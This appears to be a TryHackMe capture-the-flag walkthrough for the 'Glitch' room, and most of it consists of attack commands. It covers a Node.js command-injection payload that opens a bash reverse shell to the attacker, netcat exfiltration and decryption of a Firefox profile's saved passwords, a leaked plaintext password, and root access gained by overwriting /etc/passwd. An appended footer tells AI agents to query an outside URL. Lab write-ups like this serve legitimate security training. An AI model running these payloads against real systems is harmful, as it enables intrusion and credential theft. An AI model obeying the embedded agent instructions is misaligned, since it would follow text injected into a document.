# GLITCH **Room Link:** ### Initial Scan **Kali**

nmap -A $VICTIM

### Scan all ports No other ports found **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

### TCP/80 - HTTP Looking into api directory we find a items page **Kali** ``` gobuster dir -u http://$VICTIM/api -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

Change the request from GET to POST and it gives an interesting message

Running the below shows it is vulnerable

## Initial Shell **Kali** ``` nc -lvnp ``` **Burp** ``` POST /api/items?cmd=require("child_process").exec('bash+-c+"bash+-i+>%26+/dev/tcp/$KALI/1337+0>%261"') HTTP/1.1 Host: 10.10.22.153 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: token=value Upgrade-Insecure-Requests: 1 ```

Get autocomplete ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` ## Lateral Movement **Victim** ``` tar -cvf backup.tar.gz .firefox/ ``` ### Netcat **Kali(receiving)** ``` nc -l -p 1234 > backup.tar.gz ``` **Victim(sending)** ``` nc -w 3 $KALI 1234 < backup.tar.gz ``` **Kali** ``` tar xvf backup.tar.gz git clone https://github.com/unode/firefox_decrypt.git python3.9 firefox_decrypt/firefox_decrypt.py .firefox/ ```

**Victim** ``` su v0id Password: love_the_void ```

**Victim** ``` find / -perm -u=s -type f 2> /dev/null ```

**Victim** ``` /usr/local/bin/doas -u root cat /root/root.txt ```

## Privilege Escalation I used doas to read the passwd file, make a backup called passwd.old just in case it broke and passwd.new and added a new user **Victim** ``` /usr/local/bin/doas -u root cat /etc/passwd vi /tmp/passwd.new new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash /usr/local/bin/doas -u root cp /tmp/passwd.new /etc/passwd su new Password: 123 ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/glitch.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.